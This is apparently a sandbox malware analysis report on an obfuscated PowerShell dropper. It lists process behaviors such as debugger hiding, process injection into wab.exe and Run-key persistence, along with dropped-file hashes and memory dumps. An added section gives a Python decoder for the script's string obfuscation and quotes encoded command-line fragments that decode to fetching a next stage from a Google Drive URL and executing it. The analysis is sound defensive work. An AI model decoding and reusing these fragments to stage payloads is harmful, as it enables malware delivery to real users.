Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
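Both powershell.exe command lines above hide every string behind a function the script names Unarmorial: it keeps the character at index 5 and every sixth one after it, stopping before the last index, so each 6-character group contributes only its final character and the trailing group is padding; the wrapper Microthermic is iex. The Python below is an added example, not code from the report or from the sample, that re-implements that decoder and runs it over five calls copied verbatim from the captured 64-bit powershell.exe command line. Decoded, they show the script setting a Mozilla User-Agent, fetching its next stage from a drive.google.com download URL (the "Legitimate hosting services abused" signature), splitting its URL list on ">" and sleeping 4 s between attempts; decoding the remaining calls the same way shows the download going to %appdata%\refulge.Bod (the 442KB file in Downloads), which is base64-decoded, cut with substring(311612,27870) and passed to iex, and that stage is what injects into wab.exe. The regex and the well-formedness check are the author's additions; a few longer strings in the captured command line (for example the one that becomes the `echo %appdata%\refulge.Bod` cmd.exe line) appear to have had runs of spaces collapsed during capture and no longer have a whole number of 6-character groups, so the example flags those instead of mis-decoding them.

```python
"""Re-implementation of the Unarmorial string decoder used by this dropper's
PowerShell stage, plus a helper that decodes every call in a script fragment."""
import re

# Parameters recovered from the captured script: $Expt124 starts at 5, steps by
# 6, and runs while it is less than (length - $Smid) with $Smid = 1.
START, STEP, TAIL = 5, 6, 1


def unarmorial(blob: str) -> str:
    """Keep the character at index 5 and every 6th after it, stopping before
    index len-1; the final 6-character group therefore never contributes."""
    limit = len(blob) - TAIL
    return "".join(blob[i] for i in range(START, limit, STEP))


def is_well_formed(blob: str) -> bool:
    """A blob produced by this scheme is a whole number of 6-character groups.
    One that is not has lost characters (collapsed whitespace is the usual
    cause) and decodes to garbage from the first short group onward."""
    return len(blob) > 0 and len(blob) % STEP == 0


CALL = re.compile(r"Unarmorial\s+'([^']*)'")   # author's regex; the blobs contain no single quotes


def decode_calls(ps_source: str) -> list:
    """Decode every Unarmorial '<blob>' call in a PowerShell fragment, in order,
    reporting malformed blobs rather than silently mis-decoding them."""
    out = []
    for m in CALL.finditer(ps_source):
        blob = m.group(1)
        out.append(unarmorial(blob) if is_well_formed(blob) else f"<malformed:{len(blob)} chars>")
    return out


# Five calls copied verbatim from the powershell.exe (PID 2612) command line.
FRAGMENT = (
    "$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';"
    "$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr rutei"
    "OverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc"
    " Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevand"
    "Octo.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswG"
    "ConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gj"
    "Cornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';"
    "$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';"
    "$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';"
    "Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');"
)


if __name__ == "__main__":
    for decoded in decode_calls(FRAGMENT):
        print(decoded)
```

Run it against the full command line (paste it into a file and pass the text to decode_calls) to recover the whole script; the few "<malformed>" entries mark where the capture lost whitespace, not a different encoding.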
Network

MITRE ATT&CK Matrix (ATT&CK v13)
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize: 68KB
MD5: 29f65ba8e88c063813cc50a4ea544e93
SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 344B
MD5: 2de9088cf1a95a0aaa8fe21df2156c5c
SHA1: 24da9fc01cdffbda6865f590b54fc54e8efec2e8
SHA256: ee8e1f98f264004c1ba99f4283694865c9de8e00fd23aa4d36f20a8f17b94a8d
SHA512: a03c271f6635deb53917186b00cfa8884d43910019e1ec656f0bfe2b98946715e05915da9a79871de9285e3ef10b0860cada77c042893bfa81f1dfa5402f1578

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E8M8QAECJ2NSW5VQYCC9.temp
Filesize: 7KB
MD5: 9cd37f3364f055b69b524ce8c8ad8142
SHA1: f7b0463d216384f2d1c39f6ca71aa8b09851b596
SHA256: 7ea3b94c59b2e349c82ab7cd562d4127d74ac80c04b3d4dbc6da701e3a3ee1ac
SHA512: 5add01628b887c6c92c26eefcbf52ca311324a18231f32f6908c757c22b9a41c7abdc05245cbe2e933df5e161776de40441ebf4f69ab395ab0c0433f38a2df0e

C:\Users\Admin\AppData\Roaming\refulge.Bod
Filesize: 442KB
MD5: d46f9ca4ea9e4dd43d582b9f2e38199e
SHA1: 09f5c2a00e0f709038145b03889e3ab6263824ed
SHA256: 94dc661c05f18accf414194688b8950a9e0180df256227f30acf4c606a923d6e
SHA512: 7cd257aa22802931aa5b9c6adee5a6430fb587da25da24e2756b0aa50af9b47f478e19705b117dc2d6032c410565a027c4545b12aedb403e3ff389567087681b

Memory dumps (Filesize)
memory/2612-21-0x000000001B750000-0x000000001BA32000-memory.dmp  2.9MB
memory/2612-22-0x0000000001D80000-0x0000000001D88000-memory.dmp  32KB
memory/2612-23-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp  9.6MB
memory/2612-24-0x0000000002E40000-0x0000000002EC0000-memory.dmp  512KB
memory/2612-25-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp  9.6MB
memory/2612-26-0x0000000002E40000-0x0000000002EC0000-memory.dmp  512KB
memory/2612-27-0x0000000002E40000-0x0000000002EC0000-memory.dmp  512KB
memory/2612-28-0x0000000002E40000-0x0000000002EC0000-memory.dmp  512KB
memory/2612-35-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp  9.6MB
memory/2612-36-0x0000000002E40000-0x0000000002EC0000-memory.dmp  512KB
memory/2612-37-0x0000000002E40000-0x0000000002EC0000-memory.dmp  512KB
memory/2612-38-0x0000000002E40000-0x0000000002EC0000-memory.dmp  512KB
memory/2612-64-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp  9.6MB
memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp  16.4MB
memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp  264KB
memory/2884-34-0x0000000006730000-0x0000000007768000-memory.dmp  16.2MB